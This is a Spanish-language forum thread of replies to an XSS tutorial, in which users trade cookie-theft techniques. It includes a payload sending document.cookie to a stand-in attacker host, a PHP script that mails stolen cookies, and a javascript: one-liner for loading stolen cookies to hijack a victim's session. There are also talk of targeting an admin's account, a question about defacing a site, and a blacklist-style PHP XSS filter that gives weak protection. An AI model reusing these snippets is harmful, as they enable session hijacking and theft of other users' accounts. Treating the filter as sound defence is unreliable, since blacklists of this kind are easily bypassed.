Autor
|
Tema: [::Tutorial::] - Ataques XSS (Leído 148,294 veces)
|
Ch@CaL
Desconectado
Mensajes: 27
All in your mind....
|
Muy buen manual man xo tengo una duda,yo entro x ejemplo en el foro,xa ello me he de registrar x lo tanto he de ser usuario xa poder colocar la url entonces al ser usuiario xa que quiero saber el pass de otro user me interesaria saber la del admin mejor no?ahi supongo que entra a formar parte la ingenieria social.Me apareceran en el text todas las cookies de todos los que lo pinxen?
|
|
|
En línea
|
Ch@CaL
|
|
|
|Azrack|
Desconectado
Mensajes: 102
Enjoy The Silence
|
y si yo le paaso solo el enlace: http://www.atacante.com/cookies.php?cookie='+document.cookie;</script> no serviria xq para robar la cookie la redirecion tiene q' ser desde la web vulnerable?
|
|
|
En línea
|
|
|
|
security
Desconectado
Mensajes: 1
|
<script>alert()</script>
|
|
|
En línea
|
|
|
|
Dr. Stephen Falken
Desconectado
Mensajes: 1
|
A día de hoy esta vulnerabilidad está casi capada. No?
|
|
|
En línea
|
|
|
|
NaphacK
Desconectado
Mensajes: 11
|
A día de hoy esta vulnerabilidad está casi capada. No?
No, aun se siguen encontrando vulnerables... Aunque tengo una duda... Que pasa si la pagina me dio acceso a unos archivos tipo ftp, lo que pasa es que me queda de una forma asi: www.webvulnerable.com/free-press/unaslibrerias por esas librerias puedo navegar tranquilamente, y son scripts en java y php... Osea, aunque no sea un boton buscar, puedo ejecutar igual la url maligna? Saludos...
|
|
|
En línea
|
|
|
|
merinodaniel
Desconectado
Mensajes: 1
|
hola a toos, justo he estado investigando XSS, y encontre q tb se puede hacer q se envie la cookie a un mail... <?php $cookie = $_GET["cookie"]; mail("admin@gensale.net", "Cookie stealer report", $cookie); ?> este codigo seria para la pag: cookie.php Este codigo fue publicado en el blog: blog.gensale.net Yo no soy el autor.. byes
|
|
|
En línea
|
|
|
|
R007h
Desconectado
Mensajes: 109
<script>alert('xss');</script>
|
Hola, sta muy bueno el txt... ya me consegui unas cookies pero cuando me voy al site y pongo javascript: prompt('',document.cookie);
luego reemplazo las cookies por las que yo consegui, no pasa nada, sigue estando cerrada la session de mi victima, que pasa?
|
|
|
En línea
|
<script>alert('xss');</scrip>
|
|
|
sirdarckcat
Aspirante a supervillano
Colaborador
Desconectado
Mensajes: 7.029
No estoy loco, soy mentalmente divergente
|
usa este: javascript:void prompt("Introduce la cookie:",document.cookie).replace(/[^;]+/g,function(_){document.cookie=_;});
|
|
|
En línea
|
|
|
|
slackbyte
Desconectado
Mensajes: 88
|
Que tal amigo, tengo una duda pues estoy algo novato en cuanto a los ataques XSS, un amigo queria que probara su servidor en busca de vulnerabilidades, y pues le intente con varias cosas, pero al probar lo de pnoer en el campo de texto <script>alert('vulnerable')</script> resulta que me saltó el mensaje de vulnerable. Ahora, la pregunta es ¿como puedo hacer un deface en su servidor? (conste que este chavo me dijo que no habia problema que le hiciera lo que quisiera a su sitio =P), es decir, yo puedo probar con:
<META HTTP-EQUIV="refresh" CONTENT="1; url=http://www.google.com">
y con esto lograré que cualquier persona que entre a su sitio, sea redireccionado a google? pregunto esto ya que con el ejemplo del alert() a pesar de que me manda el mensaje, al actualizar el sitio ya no me devuelve el mensaje, y lo que quiero es que esa configuracion se quede guardada, o algo por el estilo consiste el ataque xss no es asi? me gustaria me apoyaras con un poco de explicacion al respecto, de como puedo alterar el sitio y otros usuarios puedan ver esos cambios. muchas gracias.
|
|
|
En línea
|
|
|
|
KarlosVid(ÊÇ)
Desconectado
Mensajes: 473
..::(KarlosVidEC)::..
|
Este es el Codigo permite proteger ataques xss <?php function xss($val) { $patron = '[ ]+'; $val= ereg_replace($patron,' ', $val); $patron = '[ ]*>'; $val= ereg_replace($patron,'>', $val); $a=array('xml','script', 'applet','embed','iframe','frame', 'frameset','ilayer'); $tot=count($a)-1; for($i=0;$i<=$tot;$i++){ $tag='<'.$a[$i]; if(strpos($val,$tag)!==false){ $patron = $tag.'(.*)>(.*)<\/'.$a[$i].'[ ]*>'; $val= eregi_replace($patron,'', $val); } } $a=array('link','meta','base'); $tot=count($a)-1; for($i=0;$i<=$tot;$i++){ if(strpos($val,'<'.$a[$i])!==false){ $val= str_ireplace('<'.$a[$i],'<x',$val); } }
$a=array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload','http-equiv','content','charset'); $tot=count($a)-1; for($i=0;$i<=$tot;$i++){ if(strpos($val,$a[$i].'=')!==false){ $val= str_ireplace($a[$i].'=','',$val); } } return $val; }
?>
:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk ::
|
|
|
En línea
|
|
|
|
|
|